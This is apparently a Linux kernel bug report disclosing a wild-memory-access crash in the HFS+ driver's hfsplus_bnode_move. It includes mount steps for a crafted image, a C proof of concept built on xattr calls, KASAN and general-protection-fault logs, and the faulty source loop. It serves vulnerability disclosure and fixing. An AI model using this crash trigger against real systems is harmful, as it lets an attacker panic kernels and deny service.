Created attachment 276891 [details] The (compressed) crafted image which causes crash - Reproduce # mkdir mnt # mount -t hfsplus 81.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); listxattr(xattr, buf2, sizeof(buf2)); removexattr(xattr, "user.mime_type"); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 178.302459] ================================================================== [ 178.304073] BUG: KASAN: wild-memory-access in hfsplus_bnode_move+0x1a4/0x660 [ 178.305510] Read of size 18446744073709551602 at addr 000508000000100e by task a.out/1364 [ 178.307485] CPU: 0 PID: 1364 Comm: a.out Not tainted 4.18.0-rc1+ #6 [ 178.307488] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 178.307494] Call Trace: [ 178.307532] dump_stack+0x7b/0xb5 [ 178.307568] kasan_report+0x10c/0x390 [ 178.307573] ? hfsplus_bnode_move+0x1a4/0x660 [ 178.307590] check_memory_region+0x139/0x190 [ 178.307595] memmove+0x23/0x50 [ 178.307600] hfsplus_bnode_move+0x1a4/0x660 [ 178.307606] hfsplus_brec_insert+0x371/0x6c0 [ 178.307612] ? hfsplus_brec_keylen+0x130/0x130 [ 178.307617] ? __kmalloc+0x11f/0x240 [ 178.307623] hfsplus_create_attr+0x263/0x2b0 [ 178.307628] ? hfsplus_attr_exists+0x140/0x140 [ 178.307636] ? strncmp+0x3d/0xc0 [ 178.307641] __hfsplus_setxattr+0x2d5/0x1160 [ 178.307672] ? unwind_get_return_address+0x36/0x50 [ 178.307678] ? kasan_check_write+0x14/0x20 [ 178.307693] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 178.307700] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 178.307705] ? save_stack+0x46/0xd0 [ 178.307708] ? kasan_kmalloc+0xad/0xe0 [ 178.307712] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.307717] ? hfsplus_setxattr+0x4c/0xb0 [ 178.307720] ? hfsplus_user_setxattr+0x27/0x30 [ 178.307733] ? __vfs_setxattr+0x7c/0xa0 [ 178.307738] ? __vfs_setxattr_noperm+0x8d/0x200 [ 178.307741] ? vfs_setxattr+0xb3/0xc0 [ 178.307745] ? setxattr+0x1b3/0x260 [ 178.307748] ? path_setxattr+0x134/0x170 [ 178.307752] ? __x64_sys_setxattr+0x6d/0x80 [ 178.307766] ? do_syscall_64+0x78/0x170 [ 178.307771] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.307777] ? save_stack+0xb5/0xd0 [ 178.307780] ? save_stack+0x46/0xd0 [ 178.307783] ? kasan_kmalloc+0xad/0xe0 [ 178.307791] ? __kmalloc_node+0x11e/0x2e0 [ 178.307807] ? kvmalloc_node+0x31/0x80 [ 178.307811] ? setxattr+0x114/0x260 [ 178.307815] ? path_setxattr+0x134/0x170 [ 178.307819] ? __x64_sys_setxattr+0x6d/0x80 [ 178.307822] ? do_syscall_64+0x78/0x170 [ 178.307827] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.307831] ? save_stack+0xb5/0xd0 [ 178.307834] ? save_stack+0x46/0xd0 [ 178.307838] ? __kasan_slab_free+0x13c/0x1a0 [ 178.307841] ? kasan_slab_free+0xe/0x10 [ 178.307845] ? kmem_cache_free+0x89/0x1e0 [ 178.307854] ? putname+0x80/0x90 [ 178.307858] ? filename_lookup+0x191/0x280 [ 178.307862] ? kasan_unpoison_shadow+0x36/0x50 [ 178.307866] ? kasan_kmalloc+0xad/0xe0 [ 178.307871] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.307877] hfsplus_setxattr+0x8a/0xb0 [ 178.307881] hfsplus_user_setxattr+0x27/0x30 [ 178.307885] __vfs_setxattr+0x7c/0xa0 [ 178.307890] __vfs_setxattr_noperm+0x8d/0x200 [ 178.307894] vfs_setxattr+0xb3/0xc0 [ 178.307898] setxattr+0x1b3/0x260 [ 178.307902] ? vfs_setxattr+0xc0/0xc0 [ 178.307906] ? filename_lookup+0x191/0x280 [ 178.307910] ? filename_parentat+0x2b0/0x2b0 [ 178.307914] ? kasan_kmalloc+0xad/0xe0 [ 178.307919] ? kasan_check_write+0x14/0x20 [ 178.307942] ? strncpy_from_user+0xa8/0x1c0 [ 178.307954] ? __mnt_is_readonly.part.13+0x23/0x30 [ 178.307960] ? __mnt_want_write+0x9d/0xb0 [ 178.307964] path_setxattr+0x134/0x170 [ 178.307969] ? setxattr+0x260/0x260 [ 178.307978] ? vm_brk+0x20/0x20 [ 178.307984] __x64_sys_setxattr+0x6d/0x80 [ 178.307988] do_syscall_64+0x78/0x170 [ 178.307994] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.308016] RIP: 0033:0x7f73a2b2c1fa [ 178.308017] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 178.308078] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 178.308087] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa [ 178.308090] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080 [ 178.308092] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000 [ 178.308095] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 178.308097] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000 [ 178.308102] ================================================================== [ 178.309572] Disabling lock debugging due to kernel taint [ 178.309830] general protection fault: 0000 [#1] SMP KASAN PTI [ 178.311012] CPU: 0 PID: 1364 Comm: a.out Tainted: G B 4.18.0-rc1+ #6 [ 178.312569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 178.314462] RIP: 0010:__memmove+0x3d/0x1a0 [ 178.315292] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f [ 178.319037] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286 [ 178.320083] RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54 [ 178.322245] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae [ 178.323686] RBP: ffff8801f243f548 R08: ffffed003a337e01 R09: ffffed003a328414 [ 178.325139] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae [ 178.326571] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348 [ 178.328004] FS: 00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 178.329647] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 178.330809] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0 [ 178.341180] Call Trace: [ 178.342118] ? memmove+0x45/0x50 [ 178.343186] hfsplus_bnode_move+0x1a4/0x660 [ 178.344051] hfsplus_brec_insert+0x371/0x6c0 [ 178.344946] ? hfsplus_brec_keylen+0x130/0x130 [ 178.345858] ? __kmalloc+0x11f/0x240 [ 178.346609] hfsplus_create_attr+0x263/0x2b0 [ 178.347488] ? hfsplus_attr_exists+0x140/0x140 [ 178.348418] ? strncmp+0x3d/0xc0 [ 178.349091] __hfsplus_setxattr+0x2d5/0x1160 [ 178.349970] ? unwind_get_return_address+0x36/0x50 [ 178.350952] ? kasan_check_write+0x14/0x20 [ 178.351795] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 178.353173] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 178.354364] ? save_stack+0x46/0xd0 [ 178.355088] ? kasan_kmalloc+0xad/0xe0 [ 178.355862] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.356842] ? hfsplus_setxattr+0x4c/0xb0 [ 178.357671] ? hfsplus_user_setxattr+0x27/0x30 [ 178.358845] ? __vfs_setxattr+0x7c/0xa0 [ 178.359639] ? __vfs_setxattr_noperm+0x8d/0x200 [ 178.360683] ? vfs_setxattr+0xb3/0xc0 [ 178.361706] ? setxattr+0x1b3/0x260 [ 178.362432] ? path_setxattr+0x134/0x170 [ 178.363241] ? __x64_sys_setxattr+0x6d/0x80 [ 178.364099] ? do_syscall_64+0x78/0x170 [ 178.365000] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.366063] ? save_stack+0xb5/0xd0 [ 178.366786] ? save_stack+0x46/0xd0 [ 178.367503] ? kasan_kmalloc+0xad/0xe0 [ 178.368386] ? __kmalloc_node+0x11e/0x2e0 [ 178.369208] ? kvmalloc_node+0x31/0x80 [ 178.369979] ? setxattr+0x114/0x260 [ 178.370698] ? path_setxattr+0x134/0x170 [ 178.371504] ? __x64_sys_setxattr+0x6d/0x80 [ 178.372472] ? do_syscall_64+0x78/0x170 [ 178.373261] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.374318] ? save_stack+0xb5/0xd0 [ 178.375036] ? save_stack+0x46/0xd0 [ 178.375753] ? __kasan_slab_free+0x13c/0x1a0 [ 178.376636] ? kasan_slab_free+0xe/0x10 [ 178.377424] ? kmem_cache_free+0x89/0x1e0 [ 178.378245] ? putname+0x80/0x90 [ 178.378913] ? filename_lookup+0x191/0x280 [ 178.379750] ? kasan_unpoison_shadow+0x36/0x50 [ 178.380762] ? kasan_kmalloc+0xad/0xe0 [ 178.381532] ? kmem_cache_alloc_trace+0x102/0x200 [ 178.382490] hfsplus_setxattr+0x8a/0xb0 [ 178.383276] hfsplus_user_setxattr+0x27/0x30 [ 178.384256] __vfs_setxattr+0x7c/0xa0 [ 178.385009] __vfs_setxattr_noperm+0x8d/0x200 [ 178.385896] vfs_setxattr+0xb3/0xc0 [ 178.386614] setxattr+0x1b3/0x260 [ 178.387296] ? vfs_setxattr+0xc0/0xc0 [ 178.388044] ? filename_lookup+0x191/0x280 [ 178.388894] ? filename_parentat+0x2b0/0x2b0 [ 178.389767] ? kasan_kmalloc+0xad/0xe0 [ 178.390540] ? kasan_check_write+0x14/0x20 [ 178.391379] ? strncpy_from_user+0xa8/0x1c0 [ 178.392250] ? __mnt_is_readonly.part.13+0x23/0x30 [ 178.393228] ? __mnt_want_write+0x9d/0xb0 [ 178.394054] path_setxattr+0x134/0x170 [ 178.394822] ? setxattr+0x260/0x260 [ 178.395543] ? vm_brk+0x20/0x20 [ 178.396207] __x64_sys_setxattr+0x6d/0x80 [ 178.397031] do_syscall_64+0x78/0x170 [ 178.397791] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 178.398820] RIP: 0033:0x7f73a2b2c1fa [ 178.399552] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 178.403344] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 178.404860] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa [ 178.406278] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080 [ 178.407698] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000 [ 178.409124] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 178.410533] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000 [ 178.411951] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 178.421820] ---[ end trace 7f5a46c7478f1295 ]--- [ 178.422779] RIP: 0010:__memmove+0x3d/0x1a0 [ 178.423609] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f [ 178.427440] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286 [ 178.428652] RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54 [ 178.430077] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae [ 178.431488] RBP: ffff8801f243f548 R08: ffffed003a337e01 R09: ffffed003a328414 [ 178.432950] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae [ 178.434376] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348 [ 178.435793] FS: 00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 178.437444] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 178.438593] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L205 while (src < len) { memmove(kmap(*dst_page), kmap(*src_page), src); kunmap(*src_page); set_page_dirty(*dst_page); kunmap(*dst_page); len -= src; src = PAGE_SIZE; src_page--; dst_page--; } memmove() accesses wild memory which leads to kernel panic Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.